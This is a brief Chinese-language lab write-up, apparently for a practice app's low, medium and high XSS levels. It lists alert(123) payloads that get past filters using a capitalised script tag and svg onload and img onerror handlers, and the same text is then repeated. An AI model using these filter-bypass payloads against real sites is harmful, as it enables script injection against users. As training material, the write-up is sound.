一、低级low
简单拿捏
<script>alert(123)</script>
二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>
三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>
简单拿捏
<script>alert(123)</script>
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>